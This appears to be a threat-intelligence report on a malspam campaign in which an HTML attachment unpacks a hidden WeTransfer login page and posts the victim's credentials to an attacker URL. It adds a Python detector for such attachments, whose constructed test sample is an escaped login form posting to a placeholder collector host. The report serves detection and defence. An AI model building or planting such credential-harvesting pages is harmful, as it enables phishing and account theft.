On 20 September, Infoblox observed a malicious spam (malspam) campaign delivering a malicious HTML file capable of phishing for credentials. While threat actor(s) used generic lures in their emails, the HTML file specifically targeted WeTransfer, a file-sharing service.
2. Customer Impact
Threat actors used a malicious HTML file in this campaign that is not related to any family of malware that Infoblox is aware of. The file harvests and exfiltrates WeTransfer credentials.
3. Campaign Analysis
In this campaign, threat actors sent victims an email with a subject of Request for Quotation-Urgent!!!. While the message body was empty, the email did include an HTML file attachment named order – Copy.html.
4. Attack Chain
The HTML file contains a second, escaped HTML page embedded in its contents. When the victim opens the attachment, it unpacks this secondary page and tells the user that they are viewing a secure document and must log in to view its contents. If the user successfully logs into the WeTransfer service, an iframe embedded in the second HTML page collects the credentials and posts them to an attacker-owned URL. If the login fails, the page instead tells the user that their credentials are invalid.
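As an added detection example (not part of the Infoblox report), the following Python inspects an HTML attachment for the pattern described above: a string literal unpacked via JavaScript `unescape()`/`decodeURIComponent()` that yields a second page containing a password field and a form or iframe pointing off-site. The allowlist of hosts and the sample attachment are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hosts treated as legitimate for this check (assumption; adjust per environment).
ALLOWED_HOSTS = {"wetransfer.com", "www.wetransfer.com"}
# String literal passed to JavaScript unescape()/decodeURIComponent().
ESCAPED_LITERAL = re.compile(r'(?:unescape|decodeURIComponent)\(\s*(["\'])([^"\']+)\1\s*\)')

class _Collector(HTMLParser):
    """Collects form actions, iframe sources and password inputs from HTML."""
    def __init__(self):
        super().__init__()
        self.targets, self.password_fields = [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.targets.append(a["action"])
        elif tag == "iframe" and a.get("src"):
            self.targets.append(a["src"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1

def unpack_escaped_pages(html):
    """Decode every escaped literal; unquote() covers %XX (JavaScript %uXXXX is not handled)."""
    return [unquote(m.group(2)) for m in ESCAPED_LITERAL.finditer(html)]

def scan_attachment(html):
    """Parse the outer file and each unpacked page; flag a hidden login form posting off-site."""
    pages = unpack_escaped_pages(html)
    collector = _Collector()
    for page in [html] + pages:
        collector.feed(page)
    hosts = {urlparse(u).hostname for u in collector.targets}
    external = sorted(h for h in hosts if h and h not in ALLOWED_HOSTS)
    return {
        "embedded_pages": len(pages),
        "password_fields": collector.password_fields,
        "external_hosts": external,
        "suspicious": bool(pages) and collector.password_fields > 0 and bool(external),
    }
# Constructed sample (not the campaign's file): the outer page unpacks an escaped
# login form whose action points at a placeholder collector host.
SAMPLE = ('<html><script>document.write(unescape("%3Cform%20action%3D%22https%3A%2F%2F'
          'collector.example.invalid%2Fpost%22%20method%3D%22post%22%3E%3Cinput%20type%3D'
          '%22password%22%20name%3D%22pw%22%3E%3C%2Fform%3E"))</script></html>')

if __name__ == "__main__":
    print(scan_attachment(SAMPLE))
```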
5. Vulnerabilities and Mitigation
This malspam campaign relies solely on social engineering tactics to persuade the victim into revealing their credentials. As such, Infoblox recommends the following precautions to reduce the possibility of compromise: